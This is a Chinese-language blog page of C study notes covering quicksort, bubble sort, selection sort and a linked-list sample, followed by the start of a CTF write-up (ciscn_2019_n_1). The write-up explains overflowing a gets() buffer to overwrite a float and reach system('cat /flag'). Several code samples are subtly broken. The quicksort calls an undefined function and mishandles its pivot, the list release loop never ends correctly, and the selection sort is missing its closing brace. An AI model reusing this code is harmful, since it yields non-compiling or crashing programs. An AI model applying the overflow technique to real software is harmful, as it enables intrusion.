

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="springtime">
  <meta name="keywords" content="">
  
    <meta name="description" content="C语言day1 排序大纲要求：冒泡排序、选择排序、快速排序 1.快速排序快速排序算法通过多次比较和交换来实现排序，其排序流程如下：   (1)首先设定一个分界值，通过该分界值将数组分成左右两部分。   (2)将大于或等于分界值的数据集中到数组右边，小于分界值的数据集中到数组的左边。此时，左边部分中各元素都小于分界值，而右边部分中各元素都大于或等于分界值。   (3)然后，左边和右边的数据可以独立排">
<meta property="og:type" content="article">
<meta property="og:title" content="每日C">
<meta property="og:url" content="http://example.com/2022/09/21/%E6%AF%8F%E6%97%A5C/index.html">
<meta property="og:site_name" content="spring&#39;s blog">
<meta property="og:description" content="C语言day1 排序大纲要求：冒泡排序、选择排序、快速排序 1.快速排序快速排序算法通过多次比较和交换来实现排序，其排序流程如下：   (1)首先设定一个分界值，通过该分界值将数组分成左右两部分。   (2)将大于或等于分界值的数据集中到数组右边，小于分界值的数据集中到数组的左边。此时，左边部分中各元素都小于分界值，而右边部分中各元素都大于或等于分界值。   (3)然后，左边和右边的数据可以独立排">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2022/09/21/%E6%AF%8F%E6%97%A5C/image-20220921222427122.png">
<meta property="og:image" content="http://example.com/2022/09/21/%E6%AF%8F%E6%97%A5C/image-20220918214922852.png">
<meta property="og:image" content="http://example.com/2022/09/21/%E6%AF%8F%E6%97%A5C/image-20220918215707990.png">
<meta property="og:image" content="http://example.com/2022/09/21/%E6%AF%8F%E6%97%A5C/image-20220922155503252.png">
<meta property="og:image" content="http://example.com/2022/09/21/%E6%AF%8F%E6%97%A5C/image-20220922155437096.png">
<meta property="og:image" content="http://example.com/2022/09/21/%E6%AF%8F%E6%97%A5C/image-20220922155903548.png">
<meta property="og:image" content="http://example.com/2022/09/21/%E6%AF%8F%E6%97%A5C/image-20220922161307516.png">
<meta property="og:image" content="http://example.com/2022/09/21/%E6%AF%8F%E6%97%A5C/image-20220922161353668.png">
<meta property="og:image" content="http://example.com/2022/09/21/%E6%AF%8F%E6%97%A5C/image-20220922161703291.png">
<meta property="article:published_time" content="2022-09-21T13:26:35.000Z">
<meta property="article:modified_time" content="2022-09-22T08:23:53.840Z">
<meta property="article:author" content="springtime">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/2022/09/21/%E6%AF%8F%E6%97%A5C/image-20220921222427122.png">
  
  
  
  <title>每日C - spring&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.2","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>springtime</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="每日C"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-09-21 21:26" pubdate>
          September 21, 2022 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          8.2k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          69 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">每日C</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="C语言"><a href="#C语言" class="headerlink" title="C语言"></a>C语言</h1><h2 id="day1-排序"><a href="#day1-排序" class="headerlink" title="day1 排序"></a>day1 排序</h2><p>大纲要求：冒泡排序、选择排序、快速排序</p>
<h3 id="1-快速排序"><a href="#1-快速排序" class="headerlink" title="1.快速排序"></a>1.快速排序</h3><p>快速排序算法通过多次比较和交换来实现排序，其排序流程如下：  </p>
<p>(1)首先设定一个分界值，通过该分界值将数组分成左右两部分。  </p>
<p>(2)将大于或等于分界值的数据集中到数组右边，小于分界值的数据集中到数组的左边。此时，左边部分中各元素都小于分界值，而右边部分中各元素都大于或等于分界值。  </p>
<p>(3)然后，左边和右边的数据可以独立排序。对于左侧的数组数据，又可以取一个分界值，将该部分数据分成左右两部分，同样在左边放置较小值，右边放置较大值。右侧的数组数据也可以做类似处理。  </p>
<p>(4)重复上述过程，可以看出，这是一个递归定义。通过递归将左侧部分排好序后，再递归排好右侧部分的顺序。当左、右两个部分各数据排序完成后，整个数组的排序也就完成了。</p>
<p><strong>要点：选取一个基准x(可以选取中间的元素或者第一个元素)，选取起点start与终点end，每次循环都把比基准大的值放在右边，比基准小的值放在左边，左边从下标i&#x3D;start递增，右边下标从j&#x3D;end递减；</strong></p>
<p><strong>循环一次之后a[i]左边都比x小，右边都比x大；把基准和a[i]替换，然后再递归即可完成排序。</strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span><span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-type">void</span> <span class="hljs-title function_">quickSort</span><span class="hljs-params">(<span class="hljs-type">int</span> a[],<span class="hljs-type">int</span> start,<span class="hljs-type">int</span> end)</span>    <span class="hljs-comment">//start和end都是指下标</span><br>&#123;<br>    <span class="hljs-type">int</span> i,j,temp,x;<br>    i=start;<br>    j=end;<br>    x=a[start];    <span class="hljs-comment">//选取基准值</span><br>    <span class="hljs-keyword">while</span>(i&lt;j)<br>    &#123;<br>        <span class="hljs-keyword">while</span>(i&lt;j &amp;&amp; x&lt;a[j])    <span class="hljs-comment">//从右向左搜索小于基准值的数,让j等于它的下标</span><br>            j--;<br>        <span class="hljs-keyword">while</span>(i&lt;j &amp;&amp; x&gt;a[i])    <span class="hljs-comment">//从左向右搜索大于基准值的数,让i等于它的下标</span><br>            i++;<br>        <span class="hljs-keyword">if</span>(i&lt;j)    <span class="hljs-comment">//在满足i&lt;j的条件下，交换a[i]和a[j]的值 </span><br>        &#123;<br>            temp=a[j];<br>            a[j]=a[i];<br>            a[i]=temp;<br>        &#125;<br>    &#125;<br>    temp=x;   <span class="hljs-comment">//跳出循环之后，把基准值和a[i]调换 </span><br>    x=a[i];<br>    a[i]=temp;<br>    <span class="hljs-keyword">if</span>(start&lt;j)    <span class="hljs-comment">//递归 </span><br>        kuaipai(a,start,j<span class="hljs-number">-1</span>);<br>	<span class="hljs-keyword">if</span>(i&lt;end)<br>        kuaipai(a,j+<span class="hljs-number">1</span>,end);<br>&#125;<br><span class="hljs-type">void</span> <span class="hljs-title function_">print</span><span class="hljs-params">(<span class="hljs-type">int</span> s[],<span class="hljs-type">int</span> n)</span><br>&#123;<br>    <span class="hljs-type">int</span> i;<br>    <span class="hljs-keyword">for</span>(i=<span class="hljs-number">0</span>;i&lt;n;i++)<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;%d &quot;</span>,s[i]);<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;\n&quot;</span>);<br>&#125;<br> <br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span><br>&#123;<br>    <span class="hljs-type">int</span> a[]=&#123;<span class="hljs-number">6</span>,<span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-number">8</span>,<span class="hljs-number">4</span>,<span class="hljs-number">9</span>,<span class="hljs-number">5</span>,<span class="hljs-number">3</span>&#125;;<br>	print(a,<span class="hljs-number">8</span>);    <span class="hljs-comment">//先在屏幕上输出原来的数字序列 </span><br>	kuaipai(a,<span class="hljs-number">0</span>,<span class="hljs-number">7</span>);    <span class="hljs-comment">//调用快排函数，将a排序 </span><br>	print(a,<span class="hljs-number">8</span>);    <span class="hljs-comment">//输出排好序的数字序列 </span><br>&#125;<br><br></code></pre></td></tr></table></figure>

<h3 id="2-冒泡排序"><a href="#2-冒泡排序" class="headerlink" title="2.冒泡排序"></a>2.冒泡排序</h3><p>要点：每次遍历把最大的数放到最后，循环n次后就完成从小到到大的排序。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">void</span> <span class="hljs-title function_">bubbleSort</span><span class="hljs-params">(<span class="hljs-type">int</span> <span class="hljs-built_in">array</span>[],<span class="hljs-type">int</span> L)</span>&#123;<br>	<span class="hljs-type">int</span> t;<br>	<span class="hljs-type">int</span> i;<br>	<span class="hljs-type">int</span> j;<br>	<span class="hljs-keyword">for</span>(i=<span class="hljs-number">0</span>;i&lt;L<span class="hljs-number">-1</span>;i++)&#123;<br>		<span class="hljs-keyword">for</span>(j=<span class="hljs-number">0</span>;j&lt;L-i<span class="hljs-number">-1</span>;j++)&#123;<br>			<span class="hljs-keyword">if</span>(<span class="hljs-built_in">array</span>[j]&gt;<span class="hljs-built_in">array</span>[j+<span class="hljs-number">1</span>])&#123;<br>				t=<span class="hljs-built_in">array</span>[j];<br>				<span class="hljs-built_in">array</span>[j]=<span class="hljs-built_in">array</span>[j+<span class="hljs-number">1</span>];<br>				<span class="hljs-built_in">array</span>[j+<span class="hljs-number">1</span>]=t;<br>			&#125;<br>		&#125;<br>	&#125;<br>&#125;<br></code></pre></td></tr></table></figure>



<h3 id="3-选择排序"><a href="#3-选择排序" class="headerlink" title="3.选择排序"></a>3.选择排序</h3><p>要点：选取最小元素的下标，初始值为0；与冒泡排序相反，冒泡排序是一轮循环把最大的元素放到最后一位a[n]，下一次循环从0到n-1，选择排序是一轮循环把最小的数放到开头a[0]，下一次循环从1到n，循环n次后就完成了排序。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">void</span> <span class="hljs-title function_">arraySort</span><span class="hljs-params">(<span class="hljs-type">int</span> <span class="hljs-built_in">array</span>[],<span class="hljs-type">int</span> L)</span>&#123;<br>	<span class="hljs-type">int</span> i,j;<br>	<span class="hljs-type">int</span> min=<span class="hljs-number">0</span>;<br>	<span class="hljs-type">int</span> temp;<br>	<span class="hljs-keyword">for</span>(i=<span class="hljs-number">0</span>;i&lt;L<span class="hljs-number">-1</span>;i++)&#123;<br>		min=i;<br>		<span class="hljs-keyword">for</span>(j=i+<span class="hljs-number">1</span>;j&lt;L;j++)&#123;<br>			<span class="hljs-keyword">if</span>(<span class="hljs-built_in">array</span>[j]&lt;<span class="hljs-built_in">array</span>[min])&#123;<br>				min=j;  <span class="hljs-comment">//最小值与本次循环开头元素交换</span><br>			&#125;<br>		&#125;<br><br>		temp=<span class="hljs-built_in">array</span>[min]; <span class="hljs-comment">//完成上述交换</span><br>		<span class="hljs-built_in">array</span>[min]=<span class="hljs-built_in">array</span>[i];<br>		<span class="hljs-built_in">array</span>[i]=temp;<br>	&#125;<br></code></pre></td></tr></table></figure>

<h2 id="day2-链表"><a href="#day2-链表" class="headerlink" title="day2 链表"></a>day2 链表</h2><p>大纲要求：创建单向动态链表(创建)、输出链表(遍历)、释放列表(删除)</p>
<p>不考顺序表。</p>
<h3 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h3><img src="/2022/09/21/%E6%AF%8F%E6%97%A5C/image-20220921222427122.png" srcset="/img/loading.gif" lazyload class="" title="image-20220921222427122">

<h3 id="sample"><a href="#sample" class="headerlink" title="sample"></a>sample</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br></pre></td><td class="code"><pre><code class="hljs c"><br><span class="hljs-comment">//师姐资料里的</span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdlib.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> LEN sizeof(struct Stu)</span><br><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">Stu</span></span><br><span class="hljs-class">&#123;</span><br>	<span class="hljs-type">int</span> num;<br>	<span class="hljs-type">float</span> score;<br>	<span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">Stu</span> *<span class="hljs-title">next</span>;</span><br>&#125;;<br><span class="hljs-type">int</span> n=<span class="hljs-number">0</span>;<br><br><span class="hljs-keyword">struct</span> Stu * <span class="hljs-title function_">creat</span><span class="hljs-params">(<span class="hljs-type">void</span>)</span><br>&#123;<br>	<span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">Stu</span> *<span class="hljs-title">head</span>=</span><span class="hljs-literal">NULL</span>,*p1,*p2;<br>	p1=p2=(<span class="hljs-keyword">struct</span> Stu*)<span class="hljs-built_in">malloc</span>(LEN);<br>	<span class="hljs-built_in">scanf</span>(<span class="hljs-string">&quot;%d %f&quot;</span>,&amp;p1-&gt;num,&amp;p1-&gt;score);<br>	<span class="hljs-keyword">while</span>(p1-&gt;num)<br>	&#123;<br>		n++;<br>		<span class="hljs-keyword">if</span>(n==<span class="hljs-number">1</span>)<br>			head=p1;<br>		<span class="hljs-keyword">else</span><br>		&#123;<br>			p2-&gt;next=p1;<br>			p2=p1;<br>		&#125;<br>		p1=(<span class="hljs-keyword">struct</span> Stu*)<span class="hljs-built_in">malloc</span>(LEN);<br>		<span class="hljs-built_in">scanf</span>(<span class="hljs-string">&quot;%d %f&quot;</span>,&amp;p1-&gt;num,&amp;p1-&gt;score);<br>	&#125;<br>	p2-&gt;next=<span class="hljs-literal">NULL</span>;<br>	<span class="hljs-keyword">return</span> head;<br>&#125;<br><br><span class="hljs-type">void</span> <span class="hljs-title function_">print</span><span class="hljs-params">(<span class="hljs-keyword">struct</span> Stu* head)</span><br>&#123;<br>	<span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">Stu</span>*<span class="hljs-title">p</span>=</span>head;<br>	<span class="hljs-keyword">while</span>(p!=<span class="hljs-literal">NULL</span>)<br>	&#123;<br>		<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;%d:%5.1f\n&quot;</span>,p-&gt;num,p-&gt;score);<br>		p=p-&gt;next;<br>	&#125;<br>&#125;<br><br><span class="hljs-keyword">struct</span> Stu *<span class="hljs-title function_">insert</span><span class="hljs-params">(<span class="hljs-keyword">struct</span> Stu *head,<span class="hljs-keyword">struct</span> Stu *p)</span><br>&#123;<br>	<span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">Stu</span> *<span class="hljs-title">p1</span>=</span>head,*p2=head;<br>	<span class="hljs-keyword">if</span>(head==<span class="hljs-literal">NULL</span>)<br>		&#123;head=p;p-&gt;next=<span class="hljs-literal">NULL</span>;&#125;<br>	<span class="hljs-keyword">else</span><br>	&#123;<br>		<span class="hljs-keyword">while</span>((p-&gt;num&gt;p1-&gt;num)&amp;&amp;(p1-&gt;next!=<span class="hljs-literal">NULL</span>))<br>			&#123;p2=p1;p1=p1-&gt;next;&#125;<br>		<span class="hljs-keyword">if</span>(p1==head)<br>			&#123;head=p;p-&gt;next=p1;&#125;<br>		<span class="hljs-keyword">else</span><br>			<span class="hljs-keyword">if</span>(p-&gt;num&lt;p1-&gt;num)<br>				&#123;p2-&gt;next=p;p-&gt;next=p1;&#125;<br>			<span class="hljs-keyword">else</span><br>				&#123;p1-&gt;next=p;p-&gt;next=<span class="hljs-literal">NULL</span>;&#125;<br>	&#125;<br>	n++;<br>	<span class="hljs-keyword">return</span> head;<br>&#125;<br><br><span class="hljs-keyword">struct</span> Stu *<span class="hljs-title function_">del</span><span class="hljs-params">(<span class="hljs-keyword">struct</span> Stu *head,<span class="hljs-type">int</span> num)</span><br>&#123;<br>	<span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">Stu</span> *<span class="hljs-title">p1</span>=</span>head,*p2;<br>	<span class="hljs-keyword">while</span>(num!=p1-&gt;num&amp;&amp;p1-&gt;next!=<span class="hljs-literal">NULL</span>)<br>	&#123;p2=p1;p1=p1-&gt;next;&#125;<br>	<span class="hljs-keyword">if</span>(p1-&gt;num==num)<br>	&#123;<br>		<span class="hljs-keyword">if</span>(p1==head)<br>			head=p1-&gt;next;<br>		<span class="hljs-keyword">else</span><br>			p2-&gt;next=p1-&gt;next;<br>		n--;<br>	&#125;<br>	<span class="hljs-keyword">else</span> <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;cannot founf!\n&quot;</span>);<br>	<span class="hljs-keyword">return</span> head;<br>&#125;<br><br><span class="hljs-type">void</span> <span class="hljs-title function_">release</span><span class="hljs-params">(<span class="hljs-keyword">struct</span> Stu** head)</span><br>&#123;<br>	<span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">Stu</span>* <span class="hljs-title">p</span>;</span><br>	<span class="hljs-keyword">while</span>(head!=<span class="hljs-literal">NULL</span>)<br>	&#123;<br>		p=*head;<br>		*head=p-&gt;next;<br>		<span class="hljs-built_in">free</span>(p);<br>	&#125;<br>&#125;<br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span><br>&#123;<br>	<span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">Stu</span>*<span class="hljs-title">head</span>=</span>creat();<br>	print(head);<br>	<span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">Stu</span> *<span class="hljs-title">in</span>;</span><br>	in=(<span class="hljs-keyword">struct</span> Stu*)<span class="hljs-built_in">malloc</span>(LEN);<br>	<span class="hljs-built_in">scanf</span>(<span class="hljs-string">&quot;%d %f&quot;</span>,&amp;in-&gt;num,&amp;in-&gt;score);<br>	print(head=insert(head,in));<br>	<span class="hljs-type">int</span> num;<br>	<span class="hljs-built_in">scanf</span>(<span class="hljs-string">&quot;%d&quot;</span>,&amp;num);<br>	print(del(head,num));<br>	release(&amp;head);<br>	<span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>



<h1 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h1><h3 id="ciscn-2019-n-1"><a href="#ciscn-2019-n-1" class="headerlink" title="ciscn_2019_n_1"></a>ciscn_2019_n_1</h3><p>首先检查程序，几乎没有保护机制。</p>
<img src="/2022/09/21/%E6%AF%8F%E6%97%A5C/image-20220918214922852.png" srcset="/img/loading.gif" lazyload class="" title="image-20220918214922852">

<p>运行一下，发现似乎需要我们输入一个数，然后进行判断，反编译找到源码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">int</span> <span class="hljs-title function_">func</span><span class="hljs-params">()</span><br>&#123;<br>  <span class="hljs-type">int</span> result; <span class="hljs-comment">// eax</span><br>  <span class="hljs-type">char</span> v1[<span class="hljs-number">44</span>]; <span class="hljs-comment">// [rsp+0h] [rbp-30h] BYREF</span><br>  <span class="hljs-type">float</span> v2; <span class="hljs-comment">// [rsp+2Ch] [rbp-4h]</span><br><br>  v2 = <span class="hljs-number">0.0</span>;<br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Let&#x27;s guess the number.&quot;</span>);<br>  gets(v1);<br>  <span class="hljs-keyword">if</span> ( v2 == <span class="hljs-number">11.28125</span> )<br>    result = system(<span class="hljs-string">&quot;cat /flag&quot;</span>);<br>  <span class="hljs-keyword">else</span><br>    result = <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Its value should be 11.28125&quot;</span>);<br>  <span class="hljs-keyword">return</span> result;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>v2与11.28125进行比较，如果相等就给flag；输入则是给到了v1，下面是v1、v2在栈中的分布。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-number">-0000000000000030</span> var_30          db <span class="hljs-number">44</span> dup(?)<br><span class="hljs-number">-0000000000000004</span> var_4           dd ?<br>+<span class="hljs-number">0000000000000000</span>  s              db <span class="hljs-number">8</span> dup(?)<br>+<span class="hljs-number">0000000000000008</span>  r              db <span class="hljs-number">8</span> dup(?)<br></code></pre></td></tr></table></figure>



<p>不过v1与v2都是局部变量，运行时都在栈中，gets函数无输入长度限制会导致栈溢出，因此我们输入44字节的padding填入v1，再输入4字节的11.28125覆盖v2，即可修改v2。</p>
